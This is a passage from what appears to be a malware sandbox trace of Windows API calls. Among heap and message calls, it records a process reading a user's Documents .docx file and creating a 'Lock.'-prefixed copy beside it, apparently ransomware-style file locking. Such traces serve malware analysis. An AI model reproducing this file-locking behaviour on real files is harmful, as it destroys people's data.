0x2466df0 [0265.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0265.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0265.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0265.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0265.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0265.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0265.275] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0265.275] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0265.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0265.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0265.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0265.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0265.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0265.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0265.275] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0265.275] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0265.275] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0265.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0265.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0265.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0265.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0265.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0265.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0265.275] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0265.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0265.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0265.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0265.276] CryptDestroyHash (hHash=0xaa59a0) returned 1 [0265.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0265.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0265.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0265.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0265.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0265.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0265.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0265.276] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0265.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0265.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0265.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0265.276] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0265.277] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.277] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.277] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0265.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0265.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0265.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0265.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0265.277] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/MzqysNw1q1np8jj.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mzqysnw1q1np8jj.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0265.278] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0265.278] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0265.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0265.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0265.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0265.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0265.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0265.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0265.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0265.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0265.280] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0265.280] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0265.280] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0265.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0265.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0265.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0265.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0265.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0265.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0265.280] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0265.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0265.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0265.281] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/Lock.MzqysNw1q1np8jj.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lock.mzqysnw1q1np8jj.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0265.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0265.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0265.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0265.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0265.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0265.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0265.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0265.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0265.282] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0265.282] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0265.282] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.282] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0265.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0265.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0265.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0265.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0265.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0265.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0265.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0265.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0265.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0265.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0265.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0265.283] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0265.283] ReadFile (in: hFile=0x2a0, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0265.287] ReadFile (in: hFile=0x2a0, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x4908, lpOverlapped=0x0) returned 1 [0265.287] ReadFile (in: hFile=0x2a0, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0265.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0265.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0265.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0265.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x36b0020 | out: hHeap=0x25c0000) returned 1 [0265.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0265.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0265.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0265.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0265.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0265.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0265.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0265.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0265.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0265.292] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0265.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0265.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0265.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0265.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0265.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0265.293] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0265.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0265.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0265.294] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0265.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0265.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0265.294] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0265.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0265.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0265.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0265.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2058 [0265.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0265.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0265.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0265.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0265.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14908) returned 0x24b7a48 [0265.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0265.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1368 [0265.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0265.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0265.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0265.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2ba8 [0265.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0265.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0265.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0265.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2da8 [0265.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0265.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0265.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0265.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ee8 [0265.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0265.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0265.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0265.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0265.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0265.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0265.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0265.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14908) returned 0x34b2250 [0265.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0265.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0265.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0265.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0265.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0265.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0265.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0265.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0265.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0265.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0265.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0265.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0265.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0265.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0265.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0265.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0265.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0265.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0265.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0265.299] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0265.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0265.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0265.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0265.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0265.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0265.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0265.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0265.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0265.299] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0265.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0265.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0265.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0265.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0265.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0265.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0265.300] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0265.300] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0265.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0265.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0265.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0265.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0265.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0265.300] RtlAllocateHeap 